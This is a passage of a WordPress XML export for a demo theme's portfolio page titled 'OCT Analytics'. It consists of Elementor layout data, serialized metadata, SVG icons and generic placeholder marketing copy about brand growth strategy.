0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>OCT Analytics</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/oct-analytics/</link>
		<pubDate>Fri, 11 Sep 2020 04:45:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=810</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>May 22, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>810</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:45:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:45:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[oct-analytics]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[811]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"759b1f9d","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4bee6d25","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"e966785","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"517cac51","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"1f78d6b4","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"50e4423d","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"5eda56ee","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5124a12","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1813e19b","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2c9be0ed","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5f5cb943","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"382ee553","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ca083f3","elType":"widget","settings":{"editor":"<p>May 22, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"28cceda7","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5ef59f12","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6fd44f36","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"2ca63cf2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6351dbe6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"6fe1827","elType":"section","settings":[],"elements":[{"id":"23a72b8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7537e27","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9b43d99","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f14f9c3","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"ef3f0f0","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"a802df6","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"70fea06","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"376d8fd","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"9ec0efb","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"3515713","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"b14d583","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7bbb15f","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"f6764c7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"4cc01b8","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"3a12450","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"fefe9f1","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"a4a148c","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"49d26c2","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"b630eab","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"5a4fd94","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"714f133","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #55bb53;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"3aa3702","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"9ce369a","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"71e9c5a","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mo